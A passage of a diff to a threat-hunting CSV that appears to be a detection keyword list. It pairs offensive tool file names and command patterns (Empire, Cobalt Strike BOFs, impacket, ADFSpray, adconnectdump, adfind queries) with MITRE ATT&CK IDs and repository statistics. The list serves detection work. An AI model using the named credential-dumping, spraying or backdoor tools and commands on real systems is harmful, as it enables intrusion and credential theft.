TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*Add-PSFirewallRules*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Add-RegBackdoor.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Add-PSFirewallRules*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Add-RegBackdoor.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Add-RemoteRegBackdoor*","offensive_tool_keyword","AD exploitation cheat sheet","Using DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-RemoteRegBackdoor*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*addresshunter.h*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*Add-ServiceDacl *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Add-ServiceDacl *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Add-ServiceDacl*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*addspn.py -u * -p * -t * -s * --additional *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*addspn.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*addspn.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*AddUser-Bof.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*AddUser-Bof.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" @@ -7062,39 +7206,39 @@ "*adfind.exe -gcb -sc trustdmp > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*AdFind.exe -sc getacls -sddlfilter *computer* -recmute*","offensive_tool_keyword","POC","command used in the method prerequisites of the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*adfind.exe -subnets -f (objectCategory=subnet) > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ADFSDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ADFSDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*ADFSpoof.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ADFSpoof-master*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" -"*ADFSpray.csv*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" -"*adfspray.git*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" -"*ADFSpray.py*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*ADFSpray.csv*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*adfspray.git*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*ADFSpray.py*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*ADHunt-main.zip*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*adidnsdump -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*adidnsdump*","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","8","772","105","2023-06-20T07:49:31Z","2019-04-24T17:18:46Z" "*ad-ldap-enum.py*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*ad-ldap-enum-main*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" -"*adm|admin|root|sudo|wheel*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*admin.kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*adm|admin|root|sudo|wheel*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*admin.kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*Admin2Sys.exe*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*Admin2Sys-main*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*Adminisme/ServerScan/*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" -"*adobe_top100_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*adsearch* --domain-admins*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*adsearch.exe*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*ADSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*ADSearch.sln*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*ADSearch\ADSearch.cs*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*adsearch-master.zip","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*ADSyncDecrypt.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*ADSyncGather.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*ADSyncQuery*ADSync.mdf*.txt*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*Advanced-SQL-Injection-Cheatsheet*","offensive_tool_keyword","Advanced-SQL-Injection-Cheatsheet","A cheat sheet that contains advanced queries for SQL Injection of all types.","T1548 T1562 T1027","N/A","N/A","N/A","Exploitation tools","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet","1","1","N/A","N/A","10","2239","568","2023-05-13T17:15:20Z","2020-10-23T18:14:47Z" -"*advantech_iview_networkservlet_cmd_inject.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*adxcsouf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*adobe_top100_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - 